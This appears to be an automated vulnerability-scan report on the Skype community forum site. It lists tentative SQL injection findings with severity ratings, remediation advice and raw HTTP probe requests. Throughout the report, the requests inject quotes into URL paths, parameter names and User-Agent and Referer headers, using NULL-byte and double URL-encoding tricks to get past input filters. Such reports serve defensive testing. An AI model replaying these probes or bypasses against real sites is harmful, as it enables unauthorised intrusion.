GET /t5/forums/recentpostspage/category-id/English/post-type/message HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=%00''
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title> All Posts - ...[SNIP]...
1.20. http://community.skype.com/t5/forums/recentpostspage/category-id/English/post-type/message [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /t5/forums/recentpostspage/category-id/English/post-type/message?1'=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /t5/forums/recentpostspage/category-id/English/post-type/message?1''=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /t5/forums/recentpostspage/category-id'/English/post-type/thread HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
GET /t5/forums/recentpostspage/category-id''/English/post-type/thread HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /t5/forums/searchpage/tab/message?advanced=true&filter=acceptedSolutions%2CsolvedThreads&location=Category%3AEnglish&solution=true&solved=true&sort_by=-solutionDate HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00' Connection: close
GET /t5/forums/searchpage/tab/message?advanced=true&filter=acceptedSolutions%2CsolvedThreads&location=Category%3AEnglish&solution=true&solved=true&sort_by=-solutionDate HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'' Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/help/faqpage/faq-category-id%2527/advanced HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /t5/help/faqpage/faq-category-id%2527%2527/advanced HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /t5/help/faqpage/faq-category-id/ideas HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=%00'
GET /t5/help/faqpage/faq-category-id/ideas HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=%00''
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/help/faqpage/faq-category-id/ideas HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527 Connection: close
GET /t5/help/faqpage/faq-category-id/ideas HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title> Help - Skype ...[SNIP]...
1.26. http://community.skype.com/t5/help/faqpage/faq-category-id/ideas [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://community.skype.com
Path:
/t5/help/faqpage/faq-category-id/ideas
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/help/faqpage/faq-category-id/ideas?1%2527=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /t5/help/faqpage/faq-category-id/ideas?1%2527%2527=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /t5/help/faqpage/faq-category-id/kudos HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=%00'
GET /t5/help/faqpage/faq-category-id/kudos HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=%00''
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/help/faqpage/faq-category-id/participation%2527 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /t5/help/faqpage/faq-category-id/participation%2527%2527 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/help/faqpage/faq-category-id/qa HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=%2527
GET /t5/help/faqpage/faq-category-id/qa HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=%2527%2527
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title> Help - Skype ...[SNIP]...
1.30. http://community.skype.com/t5/help/faqpage/faq-category-id/qa [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://community.skype.com
Path:
/t5/help/faqpage/faq-category-id/qa
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /t5/help/faqpage/faq-category-id/qa?1'=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /t5/help/faqpage/faq-category-id/qa?1''=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/help/faqpage/faq-category-id/video%2527 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /t5/help/faqpage/faq-category-id/video%2527%2527 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/iPad%2527/Trouble-calling-nonskype-phones-from-iPad-and-iPhone/m-p/134130 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
GET /t5/iPad%2527%2527/Trouble-calling-nonskype-phones-from-iPad-and-iPhone/m-p/134130 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/iPad/Trouble-calling-nonskype-phones-from-iPad-and-iPhone%2527/m-p/134130 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
GET /t5/iPad/Trouble-calling-nonskype-phones-from-iPad-and-iPhone%2527%2527/m-p/134130 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /t5/iPhone/A-plan-for-calling-FROM-europe-to-USA/m-p/133998 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' Connection: close
GET /t5/iPhone/A-plan-for-calling-FROM-europe-to-USA/m-p/133998 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'' Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<link class="lia-link ...[SNIP]...
1.35. http://community.skype.com/t5/iPhone/bd-p/iPhone [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://community.skype.com
Path:
/t5/iPhone/bd-p/iPhone
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /t5/iPhone/bd-p/iPhone?1'=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /t5/iPhone/bd-p/iPhone?1''=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<link class="lia-link ...[SNIP]...
1.36. http://community.skype.com/t5/notifications/notifymoderatorpage/message-uid/25246 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /t5/notifications/notifymoderatorpage/message-uid/25246?1%00'=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /t5/notifications/notifymoderatorpage/message-uid/25246?1%00''=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/tag%2527/Mac/tg-p/category-id/English HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
GET /t5/tag%2527%2527/Mac/tg-p/category-id/English HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/tag/Subscription/tg-p/category-id/English HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=%2527
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
GET /t5/tag/Subscription/tg-p/category-id/English HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=%2527%2527
1.39. http://community.skype.com/t5/tag/Video/tg-p/category-id/English [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://community.skype.com
Path:
/t5/tag/Video/tg-p/category-id/English
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/tag/Video/tg-p/category-id/English?1%2527=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /t5/tag/Video/tg-p/category-id/English?1%2527%2527=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title> Tag: "Video" ...[SNIP]...
1.40. http://community.skype.com/t5/tag/call/tg-p/category-id/English [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://community.skype.com
Path:
/t5/tag/call/tg-p/category-id/English
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /t5/tag/call/tg-p/category-id/English?1%00'=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /t5/tag/call/tg-p/category-id/English?1%00''=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/tag/crash/tg-p/category-id/English%2527 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1 (redirected)
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 21:46:57 GMT Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 X-Pad: avoid browser bug Content-Length: 35824
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title> Node 0 was N ...[SNIP]... <link href="http://community.skype.com/t5/errors/errorpage/tag-name/crash/tag-id/32/category-id/English%27" rel="canonical"> ...[SNIP]... <div class="exception-page-message NoSuchNodeException lia-component-content" class="exception-page-message NoSuchNodeException"> ...[SNIP]...
Request 2
GET /t5/tag/crash/tg-p/category-id/English%2527%2527 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.42. http://community.skype.com/t5/tag/error/tg-p/category-id/English [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://community.skype.com
Path:
/t5/tag/error/tg-p/category-id/English
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /t5/tag/error/tg-p/category-id/English?1%00'=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /t5/tag/error/tg-p/category-id/English?1%00''=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /t5/tag/spanish/tg-p/category-id/English HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q='
